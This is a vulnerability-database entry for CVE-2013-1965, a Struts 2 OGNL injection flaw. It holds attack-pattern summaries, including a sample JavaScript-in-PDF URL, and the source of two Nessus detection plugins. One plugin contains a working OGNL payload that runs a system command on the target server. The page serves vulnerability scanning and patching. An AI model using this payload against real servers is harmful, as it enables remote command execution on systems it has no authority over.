Vulnerabilities > CVE-2013-1965 - Code Injection vulnerability in Apache Struts and Struts2-Showcase
Attack vector
NETWORK Attack complexity
MEDIUM Privileges required
NONE Confidentiality impact
COMPLETE Integrity impact
COMPLETE Availability impact
COMPLETE Summary
Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Leverage Executable Code in Non-Executable Files An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/) http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
- Manipulating User-Controlled Variables This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.
D2sec
name | 2.3.14.1 RCE Linux |
url | http://www.d2sec.com/exploits/apache-struts_showcase__2.3.14.1_rce_linux.html |
Nessus
NASL family CGI abuses NASL id STRUTS_2_3_14_2_COMMAND_EXECUTION.NASL description The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to a flaw in the evaluation of an OGNL expression, a remote, unauthenticated attacker can exploit this issue to execute arbitrary commands on the remote web server by sending a specially crafted HTTP request. Note this issue exists because of an incomplete fix for CVE-2013-1966. Note that this version of Struts 2 is reportedly also affected by multiple cross-site scripting (XSS) vulnerabilities as well as session access and manipulation attacks; however, Nessus has not tested for these issues. Note that this plugin will only report the first vulnerable instance of a Struts 2 application. last seen 2020-06-01 modified 2020-06-02 plugin id 66935 published 2013-06-19 reporter This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/66935 title Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(66935); script_version("1.18"); script_cvs_date("Date: 2019/11/27"); script_cve_id("CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115"); script_bugtraq_id(60082, 60166, 60167); script_xref(name:"EDB-ID", value:"25980"); script_name(english:"Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution"); script_summary(english:"Attempts to double evaluate an action."); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a web application that uses a Java framework that is affected by a remote command execution vulnerability."); script_set_attribute(attribute:"description", value: "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to a flaw in the evaluation of an OGNL expression, a remote, unauthenticated attacker can exploit this issue to execute arbitrary commands on the remote web server by sending a specially crafted HTTP request. Note this issue exists because of an incomplete fix for CVE-2013-1966. Note that this version of Struts 2 is reportedly also affected by multiple cross-site scripting (XSS) vulnerabilities as well as session access and manipulation attacks; however, Nessus has not tested for these issues. Note that this plugin will only report the first vulnerable instance of a Struts 2 application."); # https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?51bd9543"); script_set_attribute(attribute:"see_also", value:"http://struts.apache.org/docs/s2-014.html"); script_set_attribute(attribute:"solution", value: "Upgrade to version 2.3.14.2 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2013-1965"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"Apache-Struts Showcase < 2.3.14.1 RCE Linux"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Apache Struts includeParams Remote Code Execution'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2013/05/02"); script_set_attribute(attribute:"patch_publication_date", value:"2013/05/22"); script_set_attribute(attribute:"plugin_publication_date", value:"2013/06/19"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("http_version.nasl", "webmirror.nasl", "os_fingerprint.nasl"); script_require_ports("Services/www", 80, 8080); exit(0); } include("audit.inc"); include("global_settings.inc"); include("http.inc"); include("misc_func.inc"); port = get_http_port(default:8080); cgis = get_kb_list('www/' + port + '/cgi'); urls = make_list(); # To identify actions that we can test the exploit on we will look # for files with the .action / .jsp /.do suffix from the KB. if (!isnull(cgis)) { foreach cgi (cgis) { match = pregmatch(pattern:"((^.*)(/.+\.act(ion)?)($|\?|;))", string:cgi); if (match) { urls = make_list(urls, match[0]); if (!thorough_tests) break; } match2 = pregmatch(pattern:"(^.*)(/.+\.jsp)$", string:cgi); if (!isnull(match2)) { urls = make_list(urls, match2[0]); if (!thorough_tests) break; } match3 = pregmatch(pattern:"(^.*)(/.+\.do)$", string:cgi); if (!isnull(match3)) { urls = make_list(urls, match3[0]); if (!thorough_tests) break; } if (cgi =~ "struts2?(-rest)?-showcase") { urls = make_list(urls, cgi); if (!thorough_tests) break; } } } if (thorough_tests) { cgi2 = get_kb_list('www/' + port + '/content/extensions/act*'); if (!isnull(cgi2)) urls = make_list(urls, cgi2); cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp'); if (!isnull(cgi3)) urls = make_list(urls, cgi3); cgi4 = get_kb_list('www/' + port + '/content/extensions/do'); if (!isnull(cgi4)) urls = make_list(urls, cgi4); } # Always check web root urls = make_list(urls, "/"); # Struts is slow timeout = get_read_timeout() * 2; if(timeout < 10) timeout = 10; http_set_read_timeout(timeout); urls = list_uniq(urls); # Determine which command to execute on target host os = get_kb_item("Host/OS"); if (os && report_paranoia < 2) { if ("Windows" >< os) cmd = 'ipconfig'; else cmd = 'id'; cmds = make_list(cmd); } else cmds = make_list('id', 'ipconfig'); vuln = FALSE; foreach url (urls) { foreach cmd (cmds) { vuln_url = url + "/${%23context['xwork.MethodAccessor.denyMethod" + "Execution']=!(%23_memberAccess['allowStaticMethodAccess']=true)," + "(@java.lang.Runtime@getRuntime()).exec('" +cmd+ "').waitFor()}.action"; res = http_send_recv3( method : "GET", port : port, item : vuln_url, fetch404 : TRUE, exit_on_fail : TRUE ); if ( res[0] =~ "404 Not Found" && res[2] =~ "\<b\>message\</b\> \<u\>(.*)/(0)?\.jsp\</u\>" ) { vuln = TRUE; break; } } # Stop after first vulnerable Struts app is found if (vuln) break; } if (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.'); security_report_v4( port : port, severity : SECURITY_HOLE, generic : TRUE, request : make_list(build_url(qs:vuln_url, port:port)), output : chomp(res[2]) );
NASL family Misc. NASL id STRUTS_2_3_14_3_S2012.NASL description The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.3. It, therefore, is affected by a remote command execution vulnerability in the ParameterInterceptor class due to improper handling of user-supplied input data. An unauthenticated, remote attacker could exploit this issue, via a crafted parameter name to execute arbitrary OGNL code. Note that Nessus has not tested for these issues but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 128765 published 2019-09-13 reporter This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/128765 title Apache Struts 2.x < 2.3.14.3 Remote Code Execution Vulnerability (S2-012) code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(128765); script_version("1.11"); script_cvs_date("Date: 2019/11/05"); script_cve_id("CVE-2013-1965"); script_bugtraq_id(60082); script_name(english:"Apache Struts 2.x < 2.3.14.3 Remote Code Execution Vulnerability (S2-012)"); script_summary(english:"Checks the Struts 2 version."); script_set_attribute(attribute:"synopsis", value: "A web application running on the remote host uses a Java framework that is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.3. It, therefore, is affected by a remote command execution vulnerability in the ParameterInterceptor class due to improper handling of user-supplied input data. An unauthenticated, remote attacker could exploit this issue, via a crafted parameter name to execute arbitrary OGNL code. Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number."); # https://cwiki.apache.org/confluence/display/WW/S2-012 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?a1fcdf60"); script_set_attribute(attribute:"solution", value: "Upgrade to Apache Struts version 2.3.14.3 or later"); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2013-1965"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"Apache-Struts Showcase < 2.3.14.1 RCE Linux"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"agent", value:"all"); script_set_attribute(attribute:"vuln_publication_date", value:"2013/04/16"); script_set_attribute(attribute:"patch_publication_date", value:"2013/04/16"); script_set_attribute(attribute:"plugin_publication_date", value:"2019/09/13"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"combined"); script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("os_fingerprint.nasl", "struts_detect_win.nbin", "struts_detect_nix.nbin", "struts_config_browser_detect.nbin"); script_require_keys("Settings/ParanoidReport"); script_require_ports("installed_sw/Apache Struts", "installed_sw/Struts"); exit(0); } include('vcf.inc'); if (report_paranoia < 2) audit(AUDIT_PARANOID); app_info = vcf::combined_get_app_info(app:'Apache Struts'); vcf::check_granularity(app_info:app_info, sig_segments:3); constraints = [ { 'min_version' : '2.0.0', 'fixed_version' : '2.3.14.3' } ]; vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);